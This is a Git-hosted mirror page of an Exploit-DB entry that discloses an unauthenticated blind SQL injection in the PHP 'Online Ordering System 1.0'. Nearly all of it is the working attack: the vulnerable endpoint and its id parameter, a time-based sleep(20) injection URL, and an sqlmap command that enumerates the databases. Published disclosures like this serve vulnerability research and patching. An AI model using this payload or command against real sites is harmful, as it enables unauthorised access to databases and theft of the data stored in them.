bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49618.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
902 B
Text
Raw Blame History

# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id
*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.
CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9
<http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*
--batch --dbs
3) Using the above command we will get the name of all the database.
Reference in a new issue View git blame Copy permalink